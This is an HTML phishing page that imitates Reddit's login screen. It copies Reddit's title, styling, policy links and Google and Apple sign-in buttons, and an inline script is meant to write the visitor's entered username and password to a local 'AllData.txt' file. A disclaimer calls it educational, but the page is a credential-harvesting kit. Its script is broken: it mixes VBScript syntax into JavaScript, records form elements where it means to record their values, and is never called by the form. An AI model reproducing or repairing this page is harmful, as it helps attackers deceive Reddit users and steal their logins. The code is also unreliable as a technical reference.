<!DOCTYPE html>

<html lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<!--Author: @new92-->
<!--This page has been created only for educational purposes !! The author is not responsible for any illegal actions carried out using this page-->
    <meta charset="utf-8" />
    <title>reddit.com: Log in</title>
    <link rel="icon" type="image/x-icon" href="icon.ico" />
<style>
    .side {
        height: 100vh;
        min-height: 430px;
        width: 143px;
        background-repeat: no-repeat;
        background-size: cover;
    }

    .loginp {
        font-size: 16px;
        font-weight: bold;
        color: #1a1a1b;
        font-family: sans-serif;
        margin-left: 160px;
        margin-top: -630px;
    }

    .terms {
        margin-left: 160px;
        font-size: 13px;
        font-family: sans-serif;
    }

    .ua {
        text-decoration: none;
        margin-top: 10px;
        color: #24A0ED;
    }

        .ua:hover {
            color: #2091d6;
            cursor: pointer;
        }

    .pp {
        text-decoration: none;
        margin-top: 10px;
        color: #24A0ED;
    }

        .pp:hover {
            color: #2091d6;
            cursor: pointer;
        }

    .google {
        color: #0079D3;
        font-family: sans-serif;
        font-weight: bold;
        font-size: 13px;
        margin-top: 60px;
        margin-left: 160px;
        background-color: white;
        border: 1px solid #0079D3;
        height: 50px;
        width: 270px;
        border-radius: 3px;
    }

        .google:hover {
            color: white;
            background-color: #0079D3;
            cursor: pointer;
        }

    .glogo {
        height: 20px;
        width: 20px;
        margin-left: -190px;
        margin-top: 2px;
        border-radius: 3px;
    }

    .contg {
        margin-top: -19px;
        margin-left: 25px;
    }

    .apple {
        color: #0079D3;
        font-family: sans-serif;
        font-weight: bold;
        font-size: 13px;
        margin-top: 10px;
        margin-left: 160px;
        background-color: white;
        border: 1px solid #0079D3;
        height: 50px;
        width: 270px;
        border-radius: 3px;
    }

        .apple:hover {
            color: white;
            background-color: #0079D3;
            cursor: pointer;
        }

    .alogo {
        height: 20px;
        width: 20px;
        margin-left: -190px;
        margin-top: 2px;
        border-radius: 3px;
    }

    .conta {
        margin-top: -19px;
        margin-left: 25px;
    }

    .divleft {
        border-bottom: 1px solid #edeff1;
        width: 103px;
        margin-left: 165px;
    }

    .or {
        font-family: sans-serif;
        font-weight: bold;
        font-size: 14px;
        margin-left: 280px;
        margin-top: -9px;
        color: #878a8c;
        text-transform: uppercase;
    }

    .divright {
        border-bottom: 1px solid #edeff1;
        width: 120px;
        margin-left: 314px;
        margin-top: -8px;
    }

    input {
        font-family: sans-serif;
        font-size: 15px;
    }

    .username {
        margin-left: 160px;
        margin-top: 17px;
        border: 1px solid #0000001A;
        border-radius: 3px;
        height: 38px;
        width: 270px;
        background-color: #F5F6F7;
    }

        .username:hover {
            background-color: white;
            border: 1px solid #aeaeae;
        }

        .username::placeholder {
            font-size: 11px;
            font-family: sans-serif;
            font-weight: bold;
        }

        .username:focus-visible {
            outline: 1px solid #bdbdbd;
        }

    .password {
        margin-left: 160px;
        margin-top: 10px;
        border: 1px solid #0000001A;
        border-radius: 3px;
        height: 38px;
        width: 270px;
        background-color: #F5F6F7;
    }

        .password:hover {
            background-color: white;
            border: 1px solid #aeaeae;
        }

        .password::placeholder {
            font-size: 11px;
            font-family: sans-serif;
            font-weight: bold;
        }

        .password:focus-visible {
            outline: 1px solid #bdbdbd;
        }

    .login {
        font-weight: bold;
        margin-left: 160px;
        margin-top: 8px;
        background-color: #0079D3;
        color: #fff;
        font-size: 14px;
        width: 275px;
        height: 34px;
        border-radius: 4px;
        border: 1px solid #0079D3;
    }

        .login:hover {
            background-color: #24A0ED;
            cursor: pointer;
        }

    .forgot {
        margin-left: 160px;
        font-family: sans-serif;
        font-size: 13px;
    }

    .usernamef {
        color: #24A0ED;
        text-decoration: none;
    }

    .passwordf {
        color: #24A0ED;
        text-decoration: none;
    }

    .new {
        margin-left: 160px;
        margin-top: 30px;
        font-family: sans-serif;
        font-size: 12px;
    }

    .sup {
        color: #0079d3;
        font-family: sans-serif;
        text-decoration: none;
        font-weight: bold;
    }
</style>
</head>
<body>
    <img src="side.png" class="side" />
    <p class="loginp">Log in</p>
    <p class="terms">By continuing, you agree to our<a href="https://www.redditinc.com/policies/user-agreement" class="ua" target="_blank"> User Agreement</a> and <a href="https://www.reddit.com/policies/privacy-policy" class="pp" target="_blank">Privacy Policy</a>.</p>
    <button class="google"><img src="google.png" class="glogo" /><div class="contg">CONTINUE WITH GOOGLE</div></button>
    <br />
    <button class="apple"><img src="apple.png" class="alogo"/><div class="conta">CONTINUE WITH APPLE</div></button>
    <br />
    <br />
    <br />
    <div class="divleft"></div>
    <div class="or">or</div>
    <div class="divright"></div>
    <br />
    <form>
        <label for="username"></label>
        <input type="text" class="username" name="username" id="username" placeholder="  USERNAME" required="required" />
        <br />
        <label for="password"></label>
        <input type="password" class="password" name="password" id="password" placeholder="  PASSWORD" />
        <br />
        <input class="login" type="submit" value="LOG IN" />
    </form>
    <script language="Javascript">
            function WriteToFile(passForm) {
                set fso = CreateObject("Scripting.FileSystemObject");
                set f = fso.CreateTextFile("<your path>/AllData.txt", True);

                var Username = document.getElementById('username');
                var Password = document.getElementById('password');

                f.writeline("Email :" + Username);
                f.writeline("Password :" + Password);

                f.writeline("-----------------------------");
                f.Close();
            }
    </script>
    <p class="forgot">Forgot your <a href="https://www.reddit.com/username" class="usernamef" target="_blank">username</a> or <a href="https://www.reddit.com/password" class="passwordf" target="_blank">password</a> ?</p>
    <p class="new">New to Reddit? <a href="https://www.reddit.com/account/register/" class="sup" target="_blank">SIGN UP</a></p>
</body>
</html>
